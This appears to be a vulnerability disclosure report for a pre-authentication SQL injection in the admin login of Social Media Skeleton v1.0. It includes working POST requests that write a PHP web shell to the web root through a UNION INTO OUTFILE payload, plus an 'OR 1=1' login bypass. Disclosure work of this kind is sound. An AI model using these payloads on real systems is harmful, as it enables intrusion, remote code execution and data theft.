Pre-Auth SQLi leading to RCE in Social Media Skeleton v1.0 in fobybus/social-media-skeleton
Aug 1st 2023
A SQL Injection vulnerability exists in Social Media Skeleton v1.0 via the username and password parameters in admin/login.php. Not to be confused with login.php, which properly escapes special characters.
SQL injection (SQLi) is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. This particular SQLi vulnerability allows UNION based injections, which indirectly leads to RCE.
Improper authorization in a web application undermines its security by exposing sensitive functionalities and resources to unauthorized users. This particular authorization vulnerability allows an unauthorized user to access this resource. Improper authorization is a pervasive problem throughout this application.
The affected script takes a value via a POST request and eventually concatenates it in a SQL query. admin/login.php line 4-5
This value is parsed as an array which can be manipulated to contain a malicious payload sell_return.php lines 8-9
$query="select * from admin where email='$uemail' and password='$upass'"; $result=mysqli_query($dbcon,$query);
- Risk: HIGH
- Difficulty to Exploit: LOW
The vulnerable component is bound to the network stack. The set of possible attackers extends beyond local attacks, up to and including the entire Internet. This kind of vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers).
Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.
The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the the vulnerable system to carry out an attack.
The vulnerable system can be exploited without interaction from any user.
An exploited vulnerability can affect resources beyond the security scope managed by the security authority of the vulnerable component.
There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker.
There is a total loss of data integrity.
There is a total loss of availability.
Steps to reproduce
Attacker makes this request
POST /social-media-skeleton/admin/login.php Host: localhost Content-Length: 124 Content-Type: application/x-www-form-urlencoded email=1' UNION SELECT ' system($_GET["cmd"]); ','','' INTO OUTFILE 'C:\\xampp\\htdocs\\rce.php' -- &password=anything
Or this request:
POST /social-media-skeleton/admin/login.php Host: localhost Content-Length: 118 Content-Type: application/x-www-form-urlencoded email=1&password=1' UNION SELECT ' system($_GET["cmd"]); ','','' INTO OUTFILE 'C:\\xampp\\htdocs\\rce.php' --
Should now be able to use the malicious PHP script to execute commands.
Affected Demographic/User Base
Any users of this service for their social media are at risk of having their data stolen, manipulated, or destroyed. The host of this server is at risk of system compromise.
Do not pass user controlled data to SQL queries. Use prepared statements or parameterized queries instead.
For the issued CVE ID, please credit Michael Blunt as the discovering researcher. List contact email as email@example.com. The author of this project has been contacted and this information has been shared.
An attacker who finds this system can forge a request to the admin/login.php endpoint and create a malicious PHP file. This PHP file can do anything the attacker wants within the confines of the server settings. This can result in remote code execution (RCE) and full control over the affected resource. Additionally, the attacker can call a reverse shell with the permissions of the user running the webapp.
This is a UNION based injection attack, but more generally in the class of SQL injections: Attackers can use these types of attacks to modify, add, or delete data from the remote database.
The attacker could also use this attack to log in as an administrator with the payload:
username=1' OR '1=1' -- &password=anything